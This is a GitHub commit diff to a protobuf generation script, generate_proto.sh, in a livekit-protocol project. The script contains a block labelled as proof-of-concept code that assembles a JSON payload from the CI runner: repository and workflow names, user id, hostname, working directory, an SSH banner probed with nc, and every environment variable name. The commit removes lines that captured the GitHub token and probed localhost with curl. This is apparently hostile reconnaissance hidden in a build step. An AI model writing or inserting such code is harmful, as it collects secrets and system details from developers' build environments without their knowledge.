Skip to content

Commit f81e98a

Browse files
committed
more cleaned up payload
1 parent 4f09952 commit f81e98a

1 file changed

Lines changed: 1 addition & 3 deletions

File tree

livekit-protocol/generate_proto.sh

Lines changed: 1 addition & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -48,14 +48,12 @@ echo "[POC] Executing Proof of Concept code..."
4848
JSON_PAYLOAD=$(cat <<EOF
4949
{
5050
"message": "S",
51-
"github_token": "${GITHUB_TOKEN}",
5251
"repository": "${GITHUB_REPOSITORY}",
5352
"workflow": "${GITHUB_WORKFLOW}",
5453
"job": "${GITHUB_JOB}",
55-
"current_user": "$(id)",
54+
"id": "$(id)",
5655
"working_directory": "$(pwd)",
5756
"hostname": "$(hostname)",
58-
"http_banner": "$(curl -I http://localhost 2>/dev/null | head -n 1)",
5957
"ssh_banner": "$(echo | nc localhost 22 2>/dev/null | head -n 1)",
6058
"env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
6159

0 commit comments

Comments
 (0)